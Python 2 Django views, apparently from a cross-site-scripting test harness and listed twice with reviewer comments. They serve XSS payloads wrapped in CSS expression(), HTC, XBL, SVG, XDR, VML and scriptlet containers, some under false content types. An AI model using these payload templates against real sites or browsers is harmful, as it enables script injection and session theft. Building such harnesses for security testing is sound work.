def xss(request, vector_id):
    """Render the stored vector ``vector_id`` with the generic XSS payload.

    Args:
        request: Django request; not read by this view beyond the signature.
        vector_id: primary key of the ``Vector`` row to render. ``.get()`` is
            presumably a Django manager call, so an unknown id raises
            ``Vector.DoesNotExist`` here unhandled — confirm how the project's
            middleware surfaces that.

    Returns:
        HttpResponse whose body is ``build_vector(vector, xss_payload(), "xss")``
        after a ``string_escape`` decode.
    """
    # Lookup first, then the payload, to keep the original evaluation order.
    vector = Vector.objects.get(id=vector_id)
    rendered = build_vector(vector, xss_payload(), "xss")
    # 'string_escape' is a Python 2-only codec (and str.decode does not exist
    # on Python 3 str), so this view targets Python 2.
    body = rendered.decode('string_escape')
    return HttpResponse(body)
def xss(request, vector_id):
    """Return the ``Vector`` identified by ``vector_id`` rendered with the
    generic XSS payload.

    Args:
        request: Django request; unused inside the view.
        vector_id: primary key passed to ``Vector.objects.get``. A missing row
            presumably raises ``Vector.DoesNotExist`` (Django manager
            semantics — confirm); nothing here catches it.

    Returns:
        HttpResponse containing the ``build_vector`` output decoded with the
        ``string_escape`` codec.
    """
    vector = Vector.objects.get(id=vector_id)
    payload = xss_payload()
    # 'string_escape' is only available on Python 2 byte strings; the decode
    # would fail on Python 3.
    escaped = build_vector(vector, payload, "xss").decode("string_escape")
    return HttpResponse(escaped)
def inc(request, context, vector_id, context_id, encoding_id, type):
    """Serve the selected payload wrapped in one of several include formats.

    This reads as a view from an XSS test harness: each ``type`` branch embeds
    the payload source in a container (CSS, JS, HTC, XBL, SVG, XDR, VML,
    scriptlet, event stream, ...) and sets the Content-type that branch wants.
    Several branches label the body with a type that does not match it
    (``text/plain`` for HTC, ``image/jpeg`` for the raw source), presumably
    relying on client-side sniffing — confirm against the harness docs. Every
    branch returns active content, so this view should only be routed on the
    harness host; confirm the URL configuration.

    Args:
        request: Django request; only ``build_absolute_uri("/")`` is used, in
            the "test" context.
        context: ``"xss"`` selects ``xss_payload()``; ``"test"`` selects
            ``test_payload(vector_id, context_id, encoding_id, baseurl,
            domain)``; anything else gets a ``"WTF BBQ?"`` response.
        vector_id, context_id, encoding_id: forwarded verbatim to
            ``test_payload`` (presumably URL captures — confirm in urls).
        type: the include format to produce. Shadows the builtin ``type``;
            kept as-is because callers pass it by name.

    Returns:
        HttpResponse with the wrapped payload, or a ``"fail !"`` response for
        an unknown ``type``.

    Raises:
        ValueError: the ``"vml"`` branch raises on every call — its template
            contains literal ``%`` characters (``100%;``, ``100%"``) that are
            not escaped as ``%%`` before ``%``-formatting.
    """
    #return a given payload as an include like .js or .css etc...
    # Pre-built response used by the branches that call .write(); the other
    # branches construct their own HttpResponse and leave this one unused.
    response = HttpResponse()
    if context == "xss":
        source = xss_payload()
    elif context == "test":
        baseurl = request.build_absolute_uri("/")
        # Site.objects.get_current() — presumably django.contrib.sites; confirm.
        domain = Site.objects.get_current()
        source = test_payload(vector_id, context_id, encoding_id, baseurl, domain)
    else:
        return HttpResponse("WTF BBQ?")
    # eval_payload(source) is opaque from here; it appears to produce the form
    # of the payload that fits inside an attribute/URL slot — confirm.
    if type == "css":
        # CSS container; the %(xssmoz)s slot is deliberately filled with ''.
        css = """ background-image: url('javascript:%(eval_p)s;'); background-image: expression(%(eval_p)s); -moz-binding:url("%(xssmoz)s"); }{-o-link:'javascript:%(eval_p)s';-o-link-source: current;}"""
        eval_p = eval_payload(source)
        response['Content-type'] = 'text/css'
        response.write(css % {'eval_p': eval_p, 'xssmoz': ''})
        return response
    elif type == "js":
        # Raw source served as a script include.
        response['Content-type'] = 'application/javascript'
        response.write(source)
        return response
    elif type == "jpg":
        # Raw source, but labelled image/jpeg — the body is not an image.
        response['Content-type'] = 'image/jpeg'
        response.write(source)
        return response
    elif type == "htc":
        eval_p = eval_payload(source)
        # NOTE(review): source is concatenated into the template *before* the
        # %-formatting below, so a literal '%' inside source reaches the
        # formatter and can raise or mangle the output. Escape it as '%%' (or
        # format first, then concatenate) if that matters.
        htc = """ <?xml version="1.0"?> <x> <payload><![CDATA[<img src=x onerror=%(eval_p)s>]]></payload> </x> <PUBLIC:COMPONENT TAGNAME="xss"> <PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/> </PUBLIC:COMPONENT> <SCRIPT> function main() { """ + source + """; } </SCRIPT>"""
        response['Content-type'] = 'text/plain'
        response.write(htc % { 'eval_p': eval_p, })
        return response
    elif type == "html":
        # Rendered by payload.html; whether 'source' is autoescaped depends on
        # that template, which is not shown here.
        return render_to_response('payload.html', { 'source': source, })
    elif type == "xbl":
        eval_p = eval_payload(source)
        xbl = """ <?xml version="1.0" ?><bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation><constructor><![CDATA[%(eval_p)s]]></constructor></implementation></binding></bindings>"""
        return HttpResponse(xbl % { 'eval_p': eval_p, })
    elif type == "svg":
        eval_p = eval_payload(source)
        svg = """ <form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:%(eval_p)s"><input value="XXX" 
type="submit"/></form> """
        response['Content-type'] = 'image/svg+xml'
        response.write(svg % { 'eval_p': eval_p, })
        return response
    elif type == "svg2":
        svg = """<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="%(eval_p)s" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>"""
        response['Content-type'] = 'image/svg+xml'
        eval_p = eval_payload(source)
        response.write(svg % { 'eval_p': eval_p, })
        return response
    elif type == "svg3":
        svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <clipPath id="a" > <set xlink:href="#x" attributeName="xlink:href" begin="1s" to="javascript:%(eval_p)s" /> </clipPath> <pattern id="b"> <set xlink:href="#x" attributeName="xlink:href" begin="2s" to="javascript:%(eval_p)s" /> </pattern> <filter id="c"> <set xlink:href="#x" attributeName="xlink:href" begin="3s" to="javascript:%(eval_p)s" /> </filter> <marker id="d"> <set xlink:href="#x" attributeName="xlink:href" begin="4s" to="%(eval_p)s" /> </marker> <mask id="e"> <set xlink:href="#x" attributeName="xlink:href" begin="5s" to="javascript:%(eval_p)s" /> </mask> <linearGradient id="f"> <set xlink:href="#x" attributeName="xlink:href" begin="6s" to="javascript:%(eval_p)s" /> </linearGradient> </svg>"""
        response['Content-type'] = 'image/svg+xml'
        eval_p = eval_payload(source)
        response.write(svg % { 'eval_p': eval_p, })
        return response
    elif type == "svg4":
        # NOTE(review): this template has no %(eval_p)s slot — the value is
        # hard-coded and eval_p computed below is never used.
        svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>"""
        response['Content-type'] = 'image/svg+xml'
        eval_p = eval_payload(source)
        response.write(svg % { 'eval_p': eval_p, })
        return response
    elif type == "xxe":
        # No Content-type is set on the branches below that build a fresh
        # HttpResponse; Django's default applies.
        xxe = """<script xmlns="http://www.w3.org/1999/xhtml">%(eval_p)s</script>"""
        eval_p = eval_payload(source)
        return HttpResponse(xxe % { 'eval_p': eval_p, })
    elif type == "dtd":
        dtd = """<!ENTITY x "<html:img src='x' xmlns:html='http://www.w3.org/1999/xhtml' onerror='%(eval_p)s'/>">"""
        eval_p = eval_payload(source)
        return HttpResponse(dtd % { 'eval_p': eval_p, })
    elif type == "xdr":
        xdr = """<?xml version="1.0"?> <Schema name="x" xmlns="urn:schemas-microsoft-com:xml-data"> <ElementType name="img"> <AttributeType name="src" required="yes" default="x"/> <AttributeType name="onerror" required="yes" default="%(eval_p)s"/> <attribute type="src"/> <attribute type="onerror"/> </ElementType> </Schema>"""
        eval_p = eval_payload(source)
        return HttpResponse(xdr % { 'eval_p': eval_p, })
    elif type == "evt":
        evt = """<script xmlns="http://www.w3.org/1999/xhtml" id="x">%(eval_p)s</script>"""
        eval_p = eval_payload(source)
        return HttpResponse(evt % { 'eval_p': eval_p, })
    elif type == "vml":
        # NOTE(review): 'height:100%;width:100%' has unescaped '%' characters,
        # so the %-formatting below raises ValueError on every call. Write
        # them as '100%%' to fix.
        vml = """<xml> <rect style="height:100%;width:100%" id="xss" onmouseover="%(eval_p)s" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>"""
        eval_p = eval_payload(source)
        return HttpResponse(vml % { 'eval_p': eval_p, })
    elif type == "sct":
        sct = """<SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS> <SCRIPT Language="javascript">%(eval_p)s</SCRIPT> </SCRIPTLET>"""
        eval_p = eval_payload(source)
        return HttpResponse(sct % { 'eval_p': eval_p, })
    elif type == "php":
        # Despite the name, this serves a fixed DOM event stream; eval_p is
        # computed but never written into the body.
        event = """Event: load\ndata: \n\n"""
        eval_p = eval_payload(source)
        response['Content-type'] = 'application/x-dom-event-stream'
        response.write(event)
        return response
    else:
        # Unknown include type.
        return HttpResponse("fail !")
def inc(request, context, vector_id, context_id, encoding_id, type):
    """Serve the selected payload wrapped in one of several include formats.

    NOTE(review): this is the second ``inc`` definition in this listing; at
    import time it replaces the earlier one.

    Each ``type`` branch embeds the payload source in a container (CSS, JS,
    HTC, XBL, SVG, XDR, VML, scriptlet, event stream, ...) and sets the
    Content-type that branch wants. Some branches label the body with a type
    that does not match it (``text/plain`` for HTC, ``image/jpeg`` for the raw
    source), presumably relying on client-side sniffing — confirm against the
    harness docs. All branches return active content; confirm this view is
    routed only on the test host.

    Args:
        request: Django request; only ``build_absolute_uri("/")`` is read, in
            the "test" context.
        context: ``"xss"`` selects ``xss_payload()``; ``"test"`` selects
            ``test_payload(vector_id, context_id, encoding_id, baseurl,
            domain)``; any other value returns a ``"WTF BBQ?"`` response.
        vector_id, context_id, encoding_id: passed through unchanged to
            ``test_payload`` (presumably URL captures — confirm in urls).
        type: include format selector. Shadows the builtin ``type``; left
            unchanged because callers supply it by keyword.

    Returns:
        HttpResponse carrying the wrapped payload, or ``"fail !"`` for an
        unknown ``type``.

    Raises:
        ValueError: always, from the ``"vml"`` branch — its template holds
            literal ``%`` characters (``100%;``, ``100%"``) that are not
            doubled to ``%%`` before ``%``-formatting.
    """
    # return a given payload as an include like .js or .css etc...
    # Shared response for the branches that .write(); branches that return a
    # new HttpResponse leave it unused.
    response = HttpResponse()
    if context == "xss":
        source = xss_payload()
    elif context == "test":
        baseurl = request.build_absolute_uri("/")
        # presumably django.contrib.sites — confirm.
        domain = Site.objects.get_current()
        source = test_payload(vector_id, context_id, encoding_id, baseurl, domain)
    else:
        return HttpResponse("WTF BBQ?")
    # eval_payload(source) is defined elsewhere; from here it looks like the
    # attribute/URL-slot form of the payload — confirm.
    if type == "css":
        # CSS container; %(xssmoz)s is filled with an empty string.
        css = """ background-image: url('javascript:%(eval_p)s;'); background-image: expression(%(eval_p)s); -moz-binding:url("%(xssmoz)s"); }{-o-link:'javascript:%(eval_p)s';-o-link-source: current;}"""
        eval_p = eval_payload(source)
        response["Content-type"] = "text/css"
        response.write(css % {"eval_p": eval_p, "xssmoz": ""})
        return response
    elif type == "js":
        # Raw source as a script include.
        response["Content-type"] = "application/javascript"
        response.write(source)
        return response
    elif type == "jpg":
        # Raw source labelled image/jpeg; the body is not an image.
        response["Content-type"] = "image/jpeg"
        response.write(source)
        return response
    elif type == "htc":
        eval_p = eval_payload(source)
        # NOTE(review): source is spliced into the template before the
        # %-formatting below, so a literal '%' in source reaches the formatter
        # and can raise or mangle the output; double it to '%%' or format the
        # template before concatenating.
        htc = (
            """ <?xml version="1.0"?> <x> <payload><![CDATA[<img src=x onerror=%(eval_p)s>]]></payload> </x> <PUBLIC:COMPONENT TAGNAME="xss"> <PUBLIC:ATTACH EVENT="ondocumentready" ONEVENT="main()" LITERALCONTENT="false"/> </PUBLIC:COMPONENT> <SCRIPT> function main() { """
            + source
            + """; } </SCRIPT>"""
        )
        response["Content-type"] = "text/plain"
        response.write(htc % {"eval_p": eval_p})
        return response
    elif type == "html":
        # payload.html decides whether 'source' is autoescaped; the template is
        # not part of this listing.
        return render_to_response("payload.html", {"source": source})
    elif type == "xbl":
        eval_p = eval_payload(source)
        xbl = """ <?xml version="1.0" ?><bindings xmlns="http://www.mozilla.org/xbl"><binding id="xss"><implementation><constructor><![CDATA[%(eval_p)s]]></constructor></implementation></binding></bindings>"""
        return HttpResponse(xbl % {"eval_p": eval_p})
    elif type == "svg":
        eval_p = eval_payload(source)
        svg = """ <form xmlns="http://www.w3.org/1999/xhtml" target="_top" action="javascript:%(eval_p)s"><input value="XXX" type="submit"/></form> 
"""
        response["Content-type"] = "image/svg+xml"
        response.write(svg % {"eval_p": eval_p})
        return response
    elif type == "svg2":
        svg = """<?xml version="1.0" standalone="no"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg onload="%(eval_p)s" xmlns="http://www.w3.org/2000/svg"><defs><font id="x"><font-face font-family="y"/></font></defs></svg>"""
        response["Content-type"] = "image/svg+xml"
        eval_p = eval_payload(source)
        response.write(svg % {"eval_p": eval_p})
        return response
    elif type == "svg3":
        svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <clipPath id="a" > <set xlink:href="#x" attributeName="xlink:href" begin="1s" to="javascript:%(eval_p)s" /> </clipPath> <pattern id="b"> <set xlink:href="#x" attributeName="xlink:href" begin="2s" to="javascript:%(eval_p)s" /> </pattern> <filter id="c"> <set xlink:href="#x" attributeName="xlink:href" begin="3s" to="javascript:%(eval_p)s" /> </filter> <marker id="d"> <set xlink:href="#x" attributeName="xlink:href" begin="4s" to="%(eval_p)s" /> </marker> <mask id="e"> <set xlink:href="#x" attributeName="xlink:href" begin="5s" to="javascript:%(eval_p)s" /> </mask> <linearGradient id="f"> <set xlink:href="#x" attributeName="xlink:href" begin="6s" to="javascript:%(eval_p)s" /> </linearGradient> </svg>"""
        response["Content-type"] = "image/svg+xml"
        eval_p = eval_payload(source)
        response.write(svg % {"eval_p": eval_p})
        return response
    elif type == "svg4":
        # NOTE(review): no %(eval_p)s slot in this template — the value is
        # hard-coded and the eval_p computed below goes unused.
        svg = """<svg xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink"> <marker id="a" markerWidth="1000" markerHeight="1000" refX="0" refY="0"> <a xlink:href="http://google.com"> <set attributeName="xlink:href" to="javascript:alert(1)" begin="1s" /> <rect width="1000" height="1000" fill="white"/> </a> </marker> </svg>"""
        response["Content-type"] = "image/svg+xml"
        eval_p = eval_payload(source)
        response.write(svg % {"eval_p": eval_p})
        return response
    elif type == "xxe":
        # The branches below return a fresh HttpResponse without setting
        # Content-type, so Django's default applies.
        xxe = """<script xmlns="http://www.w3.org/1999/xhtml">%(eval_p)s</script>"""
        eval_p = eval_payload(source)
        return HttpResponse(xxe % {"eval_p": eval_p})
    elif type == "dtd":
        dtd = """<!ENTITY x "<html:img src='x' xmlns:html='http://www.w3.org/1999/xhtml' onerror='%(eval_p)s'/>">"""
        eval_p = eval_payload(source)
        return HttpResponse(dtd % {"eval_p": eval_p})
    elif type == "xdr":
        xdr = """<?xml version="1.0"?> <Schema name="x" xmlns="urn:schemas-microsoft-com:xml-data"> <ElementType name="img"> <AttributeType name="src" required="yes" default="x"/> <AttributeType name="onerror" required="yes" default="%(eval_p)s"/> <attribute type="src"/> <attribute type="onerror"/> </ElementType> </Schema>"""
        eval_p = eval_payload(source)
        return HttpResponse(xdr % {"eval_p": eval_p})
    elif type == "evt":
        evt = """<script xmlns="http://www.w3.org/1999/xhtml" id="x">%(eval_p)s</script>"""
        eval_p = eval_payload(source)
        return HttpResponse(evt % {"eval_p": eval_p})
    elif type == "vml":
        # NOTE(review): 'height:100%;width:100%' contains unescaped '%', so
        # the %-formatting below raises ValueError every time; write '100%%'.
        vml = """<xml> <rect style="height:100%;width:100%" id="xss" onmouseover="%(eval_p)s" strokecolor="white" strokeweight="2000px" filled="false" /> </xml>"""
        eval_p = eval_payload(source)
        return HttpResponse(vml % {"eval_p": eval_p})
    elif type == "sct":
        sct = """<SCRIPTLET> <IMPLEMENTS Type="Behavior"></IMPLEMENTS> <SCRIPT Language="javascript">%(eval_p)s</SCRIPT> </SCRIPTLET>"""
        eval_p = eval_payload(source)
        return HttpResponse(sct % {"eval_p": eval_p})
    elif type == "php":
        # Serves a fixed DOM event stream; eval_p is computed but not written.
        event = """Event: load\ndata: \n\n"""
        eval_p = eval_payload(source)
        response["Content-type"] = "application/x-dom-event-stream"
        response.write(event)
        return response
    else:
        # Unknown include type.
        return HttpResponse("fail !")